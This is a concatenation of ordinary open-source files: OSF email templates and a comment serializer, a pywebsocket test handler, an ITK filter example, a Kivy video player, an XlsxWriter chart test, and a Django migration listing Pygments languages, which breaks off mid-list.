logger.debug('Sending email...')
logger.debug(u'To: {to_addr}\nFrom: {from_addr}\nSubject: {subject}\nMessage: {message}'.format(**locals()))
kwargs = dict(
from_addr=from_addr,
to_addr=to_addr,
subject=subject,
message=message,
mimetype=mimetype,
ttls=ttls,
login=login,
username=username,
password=password,
categories=mail.categories,
attachment_name=attachment_name,
attachment_content=attachment_content,
)
logger.debug('Preparing to send...')
if settings.USE_EMAIL:
if settings.USE_CELERY and celery:
logger.debug('Sending via celery...')
return mailer.apply_async(kwargs=kwargs, link=callback)
else:
logger.debug('Sending without celery')
ret = mailer(**kwargs)
if callback:
callback()
return ret
def get_english_article(word):
"""
Decide whether to use 'a' or 'an' for a given English word.
:param word: the word immediately after the article
:return: 'a' or 'an'
"""
return 'a' + ('n' if word[0].lower() in 'aeiou' else '')
# Predefined Emails
TEST = Mail('test', subject='A test email to ${name}', categories=['test'])
# Emails for first-time login through external identity providers.
EXTERNAL_LOGIN_CONFIRM_EMAIL_CREATE = Mail(
'external_confirm_create',
subject='OSF Account Verification'
)
FORK_COMPLETED = Mail(
'fork_completed',
subject='Your fork has completed'
)
FORK_FAILED = Mail(
'fork_failed',
subject='Your fork has failed'
)
EXTERNAL_LOGIN_CONFIRM_EMAIL_LINK = Mail(
'external_confirm_link',
subject='OSF Account Verification'
)
EXTERNAL_LOGIN_LINK_SUCCESS = Mail(
'external_confirm_success',
subject='OSF Account Verification Success'
)
# Sign up confirmation emails for OSF, native campaigns and branded campaigns
INITIAL_CONFIRM_EMAIL = Mail(
'initial_confirm',
subject='OSF Account Verification'
)
CONFIRM_EMAIL = Mail(
'confirm',
subject='Add a new email to your OSF account'
)
CONFIRM_EMAIL_PREREG = Mail(
'confirm_prereg',
subject='OSF Account Verification, Preregistration Challenge'
)
CONFIRM_EMAIL_ERPC = Mail(
'confirm_erpc',
subject='OSF Account Verification, Election Research Preacceptance Competition'
)
CONFIRM_EMAIL_PREPRINTS = lambda name, provider: Mail(
'confirm_preprints_{}'.format(name),
subject='OSF Account Verification, {}'.format(provider)
)
CONFIRM_EMAIL_REGISTRIES_OSF = Mail(
'confirm_registries_osf',
subject='OSF Account Verification, OSF Registries'
)
CONFIRM_EMAIL_MODERATION = lambda provider: Mail(
'confirm_moderation',
subject='OSF Account Verification, {}'.format(provider.name)
)
# Merge account, add or remove email confirmation emails.
CONFIRM_MERGE = Mail('confirm_merge', subject='Confirm account merge')
PRIMARY_EMAIL_CHANGED = Mail('primary_email_changed', subject='Primary email changed')
# Contributor added confirmation emails
INVITE_DEFAULT = Mail(
'invite_default',
subject='You have been added as a contributor to an OSF project.'
)
INVITE_PREPRINT = lambda template, provider: Mail(
'invite_preprints_{}'.format(template),
subject='You have been added as a contributor to {} {} {}.'.format(get_english_article(provider.name), provider.name, provider.preprint_word)
)
CONTRIBUTOR_ADDED_DEFAULT = Mail(
'contributor_added_default',
subject='You have been added as a contributor to an OSF project.'
)
CONTRIBUTOR_ADDED_PREPRINT = lambda template, provider: Mail(
'contributor_added_preprints_{}'.format(template),
subject='You have been added as a contributor to {} {} {}.'.format(get_english_article(provider.name), provider.name, provider.preprint_word)
)
CONTRIBUTOR_ADDED_PREPRINT_NODE_FROM_OSF = Mail(
'contributor_added_preprint_node_from_osf',
subject='You have been added as a contributor to an OSF project.'
)
MODERATOR_ADDED = lambda provider: Mail(
'moderator_added',
subject='You have been added as a moderator for {}'.format(provider.name)
)
CONTRIBUTOR_ADDED_ACCESS_REQUEST = Mail(
'contributor_added_access_request',
subject='Your access request to an OSF project has been approved'
)
FORWARD_INVITE = Mail('forward_invite', subject='Please forward to ${fullname}')
FORWARD_INVITE_REGISTERED = Mail('forward_invite_registered', subject='Please forward to ${fullname}')
FORGOT_PASSWORD = Mail('forgot_password', subject='Reset Password')
PASSWORD_RESET = Mail('password_reset', subject='Your OSF password has been reset')
PENDING_VERIFICATION = Mail('pending_invite', subject='Your account is almost ready!')
PENDING_VERIFICATION_REGISTERED = Mail('pending_registered', subject='Received request to be a contributor')
REQUEST_EXPORT = Mail('support_request', subject='[via OSF] Export Request')
REQUEST_DEACTIVATION = Mail('support_request', subject='[via OSF] Deactivation Request')
SPAM_USER_BANNED = Mail('spam_user_banned', subject='[OSF] Account flagged as spam')
CONFERENCE_SUBMITTED = Mail(
'conference_submitted',
subject='Project created on OSF',
)
CONFERENCE_INACTIVE = Mail(
'conference_inactive',
subject='OSF Error: Conference inactive',
)
CONFERENCE_FAILED = Mail(
'conference_failed',
subject='OSF Error: No files attached',
)
DIGEST = Mail(
'digest', subject='OSF Notifications',
categories=['notifications', 'notifications-digest']
)
DIGEST_REVIEWS_MODERATORS = Mail(
'digest_reviews_moderators',
subject='Recent submissions to ${provider_name}',
)
TRANSACTIONAL = Mail(
'transactional', subject='OSF: ${subject}',
categories=['notifications', 'notifications-transactional']
)
# Retraction related Mail objects
PENDING_RETRACTION_ADMIN = Mail(
'pending_retraction_admin',
subject='Withdrawal pending for one of your projects.'
)
PENDING_RETRACTION_NON_ADMIN = Mail(
'pending_retraction_non_admin',
subject='Withdrawal pending for one of your projects.'
)
# Embargo related Mail objects
PENDING_EMBARGO_ADMIN = Mail(
'pending_embargo_admin',
subject='Registration pending for one of your projects.'
)
PENDING_EMBARGO_NON_ADMIN = Mail(
'pending_embargo_non_admin',
subject='Registration pending for one of your projects.'
)
# Registration related Mail Objects
PENDING_REGISTRATION_ADMIN = Mail(
'pending_registration_admin',
subject='Registration pending for one of your projects.'
)
PENDING_REGISTRATION_NON_ADMIN = Mail(
'pending_registration_non_admin',
subject='Registration pending for one of your projects.'
)
PENDING_EMBARGO_TERMINATION_ADMIN = Mail(
'pending_embargo_termination_admin',
subject='Request to end an embargo early for one of your projects.'
)
PENDING_EMBARGO_TERMINATION_NON_ADMIN = Mail(
'pending_embargo_termination_non_admin',
subject='Request to end an embargo early for one of your projects.'
)
FILE_OPERATION_SUCCESS = Mail(
'file_operation_success',
subject='Your ${action} has finished',
)
FILE_OPERATION_FAILED = Mail(
'file_operation_failed',
subject='Your ${action} has failed',
)
UNESCAPE = '<% from osf.utils.sanitize import unescape_entities %> ${unescape_entities(src.title)}'
PROBLEM_REGISTERING = 'Problem registering ' + UNESCAPE
ARCHIVE_SIZE_EXCEEDED_DESK = Mail(
'archive_size_exceeded_desk',
subject=PROBLEM_REGISTERING
)
ARCHIVE_SIZE_EXCEEDED_USER = Mail(
'archive_size_exceeded_user',
subject=PROBLEM_REGISTERING
)
ARCHIVE_COPY_ERROR_DESK = Mail(
'archive_copy_error_desk',
subject=PROBLEM_REGISTERING
)
ARCHIVE_COPY_ERROR_USER = Mail(
'archive_copy_error_user',
subject=PROBLEM_REGISTERING
)
ARCHIVE_FILE_NOT_FOUND_DESK = Mail(
'archive_file_not_found_desk',
subject=PROBLEM_REGISTERING
)
ARCHIVE_FILE_NOT_FOUND_USER = Mail(
'archive_file_not_found_user',
subject='Registration failed because of altered files'
)
ARCHIVE_UNCAUGHT_ERROR_DESK = Mail(
'archive_uncaught_error_desk',
subject=PROBLEM_REGISTERING
)
ARCHIVE_REGISTRATION_STUCK_DESK = Mail(
'archive_registration_stuck_desk',
subject='[auto] Stuck registrations audit'
)
ARCHIVE_UNCAUGHT_ERROR_USER = Mail(
'archive_uncaught_error_user',
subject=PROBLEM_REGISTERING
)
ARCHIVE_SUCCESS = Mail(
'archive_success',
subject='Registration of ' + UNESCAPE + ' complete'
)
WELCOME = Mail(
'welcome',
subject='Welcome to OSF',
engagement=True
)
WELCOME_OSF4I = Mail(
'welcome_osf4i',
subject='Welcome to OSF',
engagement=True
)
PREREG_CHALLENGE_REJECTED = Mail(
'prereg_challenge_rejected',
subject='Revisions required, your submission for the Preregistration Challenge is not yet registered'
)
PREREG_CHALLENGE_ACCEPTED = Mail(
'prereg_challenge_accepted',
subject='Your research plan has been registered and accepted for the Preregistration Challenge'
)
PREREG_CSV = Mail(
'prereg_csv',
subject='[auto] Updated Prereg CSV'
)
EMPTY = Mail('empty', subject='${subject}')
SHARE_ERROR_DESK = Mail(
'send_data_share_error_desk',
subject='Share Error'
)
SHARE_PREPRINT_ERROR_DESK = Mail(
'send_data_share_preprint_error_desk',
subject='Share Error'
)
REVIEWS_SUBMISSION_CONFIRMATION = Mail(
'reviews_submission_confirmation',
subject='Confirmation of your submission to ${provider_name}'
)
ACCESS_REQUEST_SUBMITTED = Mail(
'access_request_submitted',
subject='An OSF user has requested access to your ${node.project_or_component}'
)
ACCESS_REQUEST_DENIED = Mail(
'access_request_rejected',
subject='Your access request to an OSF project has been declined'
)
CROSSREF_ERROR = Mail(
'crossref_doi_error',
subject='There was an error creating a DOI for preprint(s). batch_id: ${batch_id}'
)
PREPRINT_WITHDRAWAL_REQUEST_GRANTED = Mail(
'preprint_withdrawal_request_granted',
subject='Your ${reviewable.provider.preprint_word} has been withdrawn',
)
| apache-2.0 |
tyagiarpit/servo | tests/wpt/web-platform-tests/tools/pywebsocket/src/test/testdata/handlers/abort_by_user_wsh.py | 496 | 1798 | # Copyright 2011, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from mod_pywebsocket import handshake
def web_socket_do_extra_handshake(request):
raise handshake.AbortedByUserException("abort for test")
def web_socket_transfer_data(request):
raise handshake.AbortedByUserException("abort for test")
# vi:sts=4 sw=4 et
| mpl-2.0 |
CIBC-Internal/itk | Wrapping/Generators/Python/Tests/MeanImageFilter.py | 19 | 1167 | #==========================================================================
#
# Copyright Insight Software Consortium
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0.txt
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#==========================================================================*/
#
# Example on the use of the MeanImageFilter
#
import itk
from sys import argv
dim = 2
IType = itk.Image[itk.UC, dim]
reader = itk.ImageFileReader[IType].New(FileName=argv[1])
filter = itk.MeanImageFilter[IType, IType].New(reader, Radius=eval(argv[3]))
watcher = itk.SimpleFilterWatcher(filter, "filter")
writer = itk.ImageFileWriter[IType].New(filter, FileName=argv[2])
writer.Update()
| apache-2.0 |
TomBaxter/osf.io | admin/spam/serializers.py | 9 | 1212 | from website.settings import DOMAIN as OSF_DOMAIN
from website.settings import OSF_SUPPORT_EMAIL
from osf.models import OSFUser
from furl import furl
def serialize_comment(comment):
reports = [
serialize_report(user, report)
for user, report in comment.reports.iteritems()
]
author_abs_url = furl(OSF_DOMAIN)
author_abs_url.path.add(comment.user.url)
return {
'id': comment._id,
'author': OSFUser.load(comment.user._id),
'author_id': comment.user._id,
'author_path': author_abs_url.url,
'date_created': comment.created,
'date_modified': comment.modified,
'content': comment.content,
'has_children': bool(getattr(comment, 'commented', [])),
'modified': comment.edited,
'is_deleted': comment.is_deleted,
'spam_status': comment.spam_status,
'reports': reports,
'node': comment.node,
'category': reports[0]['category'],
'osf_support_email': OSF_SUPPORT_EMAIL,
}
def serialize_report(user, report):
return {
'reporter': OSFUser.load(user),
'category': report.get('category', None),
'reason': report.get('text', None),
}
| apache-2.0 |
koyuawsmbrtn/eclock | windows/kivy/kivy/core/video/video_gstplayer.py | 8 | 3808 | '''
Video Gstplayer
===============
.. versionadded:: 1.8.0
Implementation of a VideoBase with Kivy :class:`~kivy.lib.gstplayer.GstPlayer`
This player is the prefered player, using Gstreamer 1.0, working on both Python
2 and 3.
'''
from kivy.lib.gstplayer import GstPlayer, get_gst_version
from kivy.graphics.texture import Texture
from kivy.core.video import VideoBase
from kivy.logger import Logger
from kivy.clock import Clock
from kivy.compat import PY2
from threading import Lock
from functools import partial
from os.path import realpath
from weakref import ref
if PY2:
from urllib import pathname2url
else:
from urllib.request import pathname2url
Logger.info('VideoGstplayer: Using Gstreamer {}'.format(
'.'.join(map(str, get_gst_version()))))
def _on_gstplayer_buffer(video, width, height, data):
video = video()
# if we still receive the video but no more player, remove it.
if not video:
return
with video._buffer_lock:
video._buffer = (width, height, data)
def _on_gstplayer_message(mtype, message):
if mtype == 'error':
Logger.error('VideoGstplayer: {}'.format(message))
elif mtype == 'warning':
Logger.warning('VideoGstplayer: {}'.format(message))
elif mtype == 'info':
Logger.info('VideoGstplayer: {}'.format(message))
class VideoGstplayer(VideoBase):
def __init__(self, **kwargs):
self.player = None
self._buffer = None
self._buffer_lock = Lock()
super(VideoGstplayer, self).__init__(**kwargs)
def _on_gst_eos_sync(self):
Clock.schedule_once(self._do_eos, 0)
def load(self):
Logger.debug('VideoGstplayer: Load <{}>'.format(self._filename))
uri = self._get_uri()
wk_self = ref(self)
self.player_callback = partial(_on_gstplayer_buffer, wk_self)
self.player = GstPlayer(uri, self.player_callback,
self._on_gst_eos_sync, _on_gstplayer_message)
self.player.set_volume(self.volume)
self.player.load()
def unload(self):
if self.player:
self.player.unload()
self.player = None
with self._buffer_lock:
self._buffer = None
self._texture = None
def stop(self):
super(VideoGstplayer, self).stop()
self.player.stop()
def pause(self):
super(VideoGstplayer, self).pause()
self.player.pause()
def play(self):
super(VideoGstplayer, self).play()
self.player.play()
def seek(self, percent):
self.player.seek(percent)
def _get_position(self):
return self.player.get_position()
def _get_duration(self):
return self.player.get_duration()
def _get_volume(self):
return self._volume
def _set_volume(self, value):
self._volume = value
if self.player:
self.player.set_volume(self._volume)
def _update(self, dt):
buf = None
with self._buffer_lock:
buf = self._buffer
self._buffer = None
if buf is not None:
self._update_texture(buf)
self.dispatch('on_frame')
def _update_texture(self, buf):
width, height, data = buf
# texture is not allocated yet, create it first
if not self._texture:
self._texture = Texture.create(size=(width, height),
colorfmt='rgb')
self._texture.flip_vertical()
self.dispatch('on_load')
self._texture.blit_buffer(data, size=(width, height), colorfmt='rgb')
def _get_uri(self):
uri = self.filename
if not uri:
return
if not '://' in uri:
uri = 'file:' + pathname2url(realpath(uri))
return uri
| gpl-2.0 |
Thhhza/XlsxWriter | xlsxwriter/test/comparison/test_chart_scatter07.py | 8 | 1897 | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2015, John McNamara, jmcnamara@cpan.org
#
from ..excel_comparsion_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.maxDiff = None
filename = 'chart_scatter07.xlsx'
test_dir = 'xlsxwriter/test/comparison/'
self.got_filename = test_dir + '_test_' + filename
self.exp_filename = test_dir + 'xlsx_files/' + filename
self.ignore_files = []
self.ignore_elements = {'xl/workbook.xml': ['<fileVersion', '<calcPr']}
def test_create_file(self):
"""Test the creation of a simple XlsxWriter file."""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
chart = workbook.add_chart({'type': 'scatter'})
chart.axis_ids = [63597952, 63616128]
chart.axis2_ids = [63617664, 63619456]
data = [
[27, 33, 44, 12, 1],
[6, 8, 6, 4, 2],
[20, 10, 30, 50, 40],
[0, 27, 23, 30, 40],
]
worksheet.write_column('A1', data[0])
worksheet.write_column('B1', data[1])
worksheet.write_column('C1', data[2])
worksheet.write_column('D1', data[3])
chart.add_series({'categories': '=Sheet1!$A$1:$A$5',
'values': '=Sheet1!$B$1:$B$5',
})
chart.add_series({'categories': '=Sheet1!$C$1:$C$5',
'values': '=Sheet1!$D$1:$D$5',
'y2_axis': 1,
})
worksheet.insert_chart('E9', chart)
workbook.close()
self.assertExcelEqual()
| bsd-2-clause |
xylan2004/AciSnippets | tutorial/snippets/migrations/0001_initial.py | 1 | 11780 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2016-12-30 05:58
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Snippet',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('highlighted', models.TextField()),
('created', models.DateTimeField(auto_now_add=True)),
('title', models.CharField(blank=True, default='', max_length=100)),
('code', models.TextField()),
('linenos', models.BooleanField(default=False)),
('language', models.CharField(choices=[('abap', 'ABAP'), ('abnf', 'ABNF'), ('ada', 'Ada'), ('adl', 'ADL'), ('agda', 'Agda'), ('ahk', 'autohotkey'), ('alloy', 'Alloy'), ('antlr', 'ANTLR'), ('antlr-as', 'ANTLR With ActionScript Target'), ('antlr-cpp', 'ANTLR With CPP Target'), ('antlr-csharp', 'ANTLR With C# Target'), ('antlr-java', 'ANTLR With Java Target'), ('antlr-objc', 'ANTLR With ObjectiveC Target'), ('antlr-perl', 'ANTLR With Perl Target'), ('antlr-python', 'ANTLR With Python Target'), ('antlr-ruby', 'ANTLR With Ruby Target'), ('apacheconf', 'ApacheConf'), ('apl', 'APL'), ('applescript', 'AppleScript'), ('arduino', 'Arduino'), ('as', 'ActionScript'), ('as3', 'ActionScript 3'), ('aspectj', 'AspectJ'), ('aspx-cs', 'aspx-cs'), ('aspx-vb', 'aspx-vb'), ('asy', 'Asymptote'), ('at', 'AmbientTalk'), ('autoit', 'AutoIt'), ('awk', 'Awk'), ('basemake', 'Base Makefile'), ('bash', 'Bash'), ('bat', 'Batchfile'), ('bbcode', 'BBCode'), ('bc', 'BC'), ('befunge', 'Befunge'), ('blitzbasic', 'BlitzBasic'), ('blitzmax', 'BlitzMax'), ('bnf', 'BNF'), ('boo', 'Boo'), ('boogie', 'Boogie'), ('brainfuck', 'Brainfuck'), ('bro', 'Bro'), ('bugs', 'BUGS'), ('c', 'C'), ('c-objdump', 'c-objdump'), ('ca65', 'ca65 assembler'), ('cadl', 'cADL'), ('camkes', 'CAmkES'), ('cbmbas', 'CBM BASIC V2'), ('ceylon', 'Ceylon'), ('cfc', 'Coldfusion CFC'), ('cfengine3', 'CFEngine3'), ('cfm', 'Coldfusion HTML'), ('cfs', 'cfstatement'), ('chai', 'ChaiScript'), ('chapel', 'Chapel'), ('cheetah', 'Cheetah'), ('cirru', 'Cirru'), ('clay', 'Clay'), ('clojure', 'Clojure'), ('clojurescript', 'ClojureScript'), ('cmake', 'CMake'), ('cobol', 'COBOL'), ('cobolfree', 'COBOLFree'), ('coffee-script', 'CoffeeScript'), ('common-lisp', 'Common Lisp'), ('componentpascal', 'Component Pascal'), ('console', 'Bash Session'), ('control', 'Debian Control file'), ('coq', 'Coq'), ('cpp', 'C++'), ('cpp-objdump', 'cpp-objdump'), ('cpsa', 'CPSA'), ('crmsh', 'Crmsh'), ('croc', 'Croc'), ('cryptol', 'Cryptol'), ('csharp', 'C#'), ('csound', 'Csound Orchestra'), ('csound-document', 'Csound Document'), ('csound-score', 'Csound Score'), ('css', 'CSS'), ('css+django', 'CSS+Django/Jinja'), ('css+erb', 'CSS+Ruby'), ('css+genshitext', 'CSS+Genshi Text'), ('css+lasso', 'CSS+Lasso'), ('css+mako', 'CSS+Mako'), ('css+mozpreproc', 'CSS+mozpreproc'), ('css+myghty', 'CSS+Myghty'), ('css+php', 'CSS+PHP'), ('css+smarty', 'CSS+Smarty'), ('cucumber', 'Gherkin'), ('cuda', 'CUDA'), ('cypher', 'Cypher'), ('cython', 'Cython'), ('d', 'D'), ('d-objdump', 'd-objdump'), ('dart', 'Dart'), ('delphi', 'Delphi'), ('dg', 'dg'), ('diff', 'Diff'), ('django', 'Django/Jinja'), ('docker', 'Docker'), ('doscon', 'MSDOS Session'), ('dpatch', 'Darcs Patch'), ('dtd', 'DTD'), ('duel', 'Duel'), ('dylan', 'Dylan'), ('dylan-console', 'Dylan session'), ('dylan-lid', 'DylanLID'), ('earl-grey', 'Earl Grey'), ('easytrieve', 'Easytrieve'), ('ebnf', 'EBNF'), ('ec', 'eC'), ('ecl', 'ECL'), ('eiffel', 'Eiffel'), ('elixir', 'Elixir'), ('elm', 'Elm'), ('emacs', 'EmacsLisp'), ('erb', 'ERB'), ('erl', 'Erlang erl session'), ('erlang', 'Erlang'), ('evoque', 'Evoque'), ('ezhil', 'Ezhil'), ('factor', 'Factor'), ('fan', 'Fantom'), ('fancy', 'Fancy'), ('felix', 'Felix'), ('fish', 'Fish'), ('fortran', 'Fortran'), ('fortranfixed', 'FortranFixed'), ('foxpro', 'FoxPro'), ('fsharp', 'FSharp'), ('gap', 'GAP'), ('gas', 'GAS'), ('genshi', 'Genshi'), ('genshitext', 'Genshi Text'), ('glsl', 'GLSL'), ('gnuplot', 'Gnuplot'), ('go', 'Go'), ('golo', 'Golo'), ('gooddata-cl', 'GoodData-CL'), ('gosu', 'Gosu'), ('groff', 'Groff'), ('groovy', 'Groovy'), ('gst', 'Gosu Template'), ('haml', 'Haml'), ('handlebars', 'Handlebars'), ('haskell', 'Haskell'), ('haxeml', 'Hxml'), ('hexdump', 'Hexdump'), ('html', 'HTML'), ('html+cheetah', 'HTML+Cheetah'), ('html+django', 'HTML+Django/Jinja'), ('html+evoque', 'HTML+Evoque'), ('html+genshi', 'HTML+Genshi'), ('html+handlebars', 'HTML+Handlebars'), ('html+lasso', 'HTML+Lasso'), ('html+mako', 'HTML+Mako'), ('html+myghty', 'HTML+Myghty'), ('html+php', 'HTML+PHP'), ('html+smarty', 'HTML+Smarty'), ('html+twig', 'HTML+Twig'), ('html+velocity', 'HTML+Velocity'), ('http', 'HTTP'), ('hx', 'Haxe'), ('hybris', 'Hybris'), ('hylang', 'Hy'), ('i6t', 'Inform 6 template'), ('idl', 'IDL'), ('idris', 'Idris'), ('iex', 'Elixir iex session'), ('igor', 'Igor'), ('inform6', 'Inform 6'), ('inform7', 'Inform 7'), ('ini', 'INI'), ('io', 'Io'), ('ioke', 'Ioke'), ('irc', 'IRC logs'), ('isabelle', 'Isabelle'), ('j', 'J'), ('jade', 'Jade'), ('jags', 'JAGS'), ('jasmin', 'Jasmin'), ('java', 'Java'), ('javascript+mozpreproc', 'Javascript+mozpreproc'), ('jcl', 'JCL'), ('jlcon', 'Julia console'), ('js', 'JavaScript'), ('js+cheetah', 'JavaScript+Cheetah'), ('js+django', 'JavaScript+Django/Jinja'), ('js+erb', 'JavaScript+Ruby'), ('js+genshitext', 'JavaScript+Genshi Text'), ('js+lasso', 'JavaScript+Lasso'), ('js+mako', 'JavaScript+Mako'), ('js+myghty', 'JavaScript+Myghty'), ('js+php', 'JavaScript+PHP'), ('js+smarty', 'JavaScript+Smarty'), ('json', 'JSON'), ('jsonld', 'JSON-LD'), ('jsp', 'Java Server Page'), ('julia', 'Julia'), ('kal', 'Kal'), ('kconfig', 'Kconfig'), ('koka', 'Koka'), ('kotlin', 'Kotlin'), ('lagda', 'Literate Agda'), ('lasso', 'Lasso'), ('lcry', 'Literate Cryptol'), ('lean', 'Lean'), ('less', 'LessCss'), ('lhs', 'Literate Haskell'), ('lidr', 'Literate Idris'), ('lighty', 'Lighttpd configuration file'), ('limbo', 'Limbo'), ('liquid', 'liquid'), ('live-script', 'LiveScript'), ('llvm', 'LLVM'), ('logos', 'Logos'), ('logtalk', 'Logtalk'), ('lsl', 'LSL'), ('lua', 'Lua'), ('make', 'Makefile'), ('mako', 'Mako'), ('maql', 'MAQL'), ('mask', 'Mask'), ('mason', 'Mason'), ('mathematica', 'Mathematica'), ('matlab', 'Matlab'), ('matlabsession', 'Matlab session'), ('minid', 'MiniD'), ('modelica', 'Modelica'), ('modula2', 'Modula-2'), ('monkey', 'Monkey'), ('moocode', 'MOOCode'), ('moon', 'MoonScript'), ('mozhashpreproc', 'mozhashpreproc'), ('mozpercentpreproc', 'mozpercentpreproc'), ('mql', 'MQL'), ('mscgen', 'Mscgen'), ('mupad', 'MuPAD'), ('mxml', 'MXML'), ('myghty', 'Myghty'), ('mysql', 'MySQL'), ('nasm', 'NASM'), ('nemerle', 'Nemerle'), ('nesc', 'nesC'), ('newlisp', 'NewLisp'), ('newspeak', 'Newspeak'), ('nginx', 'Nginx configuration file'), ('nimrod', 'Nimrod'), ('nit', 'Nit'), ('nixos', 'Nix'), ('nsis', 'NSIS'), ('numpy', 'NumPy'), ('objdump', 'objdump'), ('objdump-nasm', 'objdump-nasm'), ('objective-c', 'Objective-C'), ('objective-c++', 'Objective-C++'), ('objective-j', 'Objective-J'), ('ocaml', 'OCaml'), ('octave', 'Octave'), ('odin', 'ODIN'), ('ooc', 'Ooc'), ('opa', 'Opa'), ('openedge', 'OpenEdge ABL'), ('pacmanconf', 'PacmanConf'), ('pan', 'Pan'), ('parasail', 'ParaSail'), ('pawn', 'Pawn'), ('perl', 'Perl'), ('perl6', 'Perl6'), ('php', 'PHP'), ('pig', 'Pig'), ('pike', 'Pike'), ('pkgconfig', 'PkgConfig'), ('plpgsql', 'PL/pgSQL'), ('postgresql', 'PostgreSQL SQL dialect'), ('postscript', 'PostScript'), ('pot', 'Gettext Catalog'), ('pov', 'POVRay'), ('powershell', 'PowerShell'), ('praat', 'Praat'), ('prolog', 'Prolog'), ('properties', 'Properties'), ('protobuf', 'Protocol Buffer'), ('ps1con', 'PowerShell Session'), ('psql', 'PostgreSQL console (psql)'), ('puppet', 'Puppet'), ('py3tb', 'Python 3.0 Traceback'), ('pycon', 'Python console session'), ('pypylog', 'PyPy Log'), ('pytb', 'Python Traceback'), ('python', 'Python'), ('python3', 'Python 3'), ('qbasic', 'QBasic'), ('qml', 'QML'), ('qvto', 'QVTO'), ('racket', 'Racket'), ('ragel', 'Ragel'), ('ragel-c', 'Ragel in C Host'), ('ragel-cpp', 'Ragel in CPP Host'), ('ragel-d', 'Ragel in D Host'), ('ragel-em', 'Embedded Ragel'), ('ragel-java', 'Ragel in Java Host'), ('ragel-objc', 'Ragel in Objective C Host'), ('ragel-ruby', 'Ragel in Ruby Host'), ('raw', 'Raw token data'), ('rb', 'Ruby'), ('rbcon', 'Ruby irb session'), ('rconsole', 'RConsole'), ('rd', 'Rd'), ('rebol', 'REBOL'), ('red', 'Red'), ('redcode', 'Redcode'), ('registry', 'reg'), ('resource', 'ResourceBundle'), ('rexx', 'Rexx'), ('rhtml', 'RHTML'), ('roboconf-graph', 'Roboconf Graph'), ('roboconf-instances', 'Roboconf Instances'), ('robotframework', 'RobotFramework'), ('rql', 'RQL'), ('rsl', 'RSL'), ('rst', 'reStructuredText'), ('rts', 'TrafficScript'), ('rust', 'Rust'), ('sass', 'Sass'), ('sc', 'SuperCollider'), ('scala', 'Scala'), ('scaml', 'Scaml'), ('scheme', 'Scheme'), ('scilab', 'Scilab'), ('scss', 'SCSS'), ('shen', 'Shen'), ('slim', 'Slim'), ('smali', 'Smali'), ('smalltalk', 'Smalltalk'), ('smarty', 'Smarty'), ('sml', 'Standard ML'), ('snobol', 'Snobol'), ('sourceslist', 'Debian Sourcelist'), ('sp', 'SourcePawn'), ('sparql', 'SPARQL'), ('spec', 'RPMSpec'), ('splus', 'S'), ('sql', 'SQL'), ('sqlite3', 'sqlite3con'), ('squidconf', 'SquidConf'), ('ssp', 'Scalate Server Page'), ('stan', 'Stan'), ('swift', 'Swift'), ('swig', 'SWIG'), ('systemverilog', 'systemverilog'), ('tads3', 'TADS 3'), ('tap', 'TAP'), ('tcl', 'Tcl'), ('tcsh', 'Tcsh'), ('tcshcon', 'Tcsh Session'), ('tea', 'Tea'), ('termcap', 'Termcap'), ('terminfo', 'Terminfo'), ('terraform', 'Terraform'), ('tex', 'TeX'), ('text', 'Text only'), ('thrift', 'Thrift'), ('todotxt', 'Todotxt'), ('trac-wiki', 'MoinMoin/Trac Wiki markup'), ('treetop', 'Treetop'), ('ts', 'TypeScript'), ('turtle', 'Turtle'), ('twig', 'Twig'), ('urbiscript', 'UrbiScript'), ('vala', 'Vala'), ('vb.net', 'VB.net'), ('vctreestatus', 'VCTreeStatus'), ('velocity', 'Velocity'), ('verilog', 'verilog'), ('vgl', 'VGL'), ('vhdl', 'vhdl'), ('vim', 'VimL'), ('x10', 'X10'), ('xml', 'XML'), ('xml+cheetah', 'XML+Cheetah'), ('xml+django', 'XML+Django/Jinja'), ('xml+erb', 'XML+Ruby'), ('xml+evoque', 'XML+Evoque'), ('xml+lasso', 'XML+Lasso'), ('xml+mako', 'XML+Mako'), ('xml+myghty', 'XML+Myghty'), ('xml+php', 'XML+PHP'), ('xml+smarty', 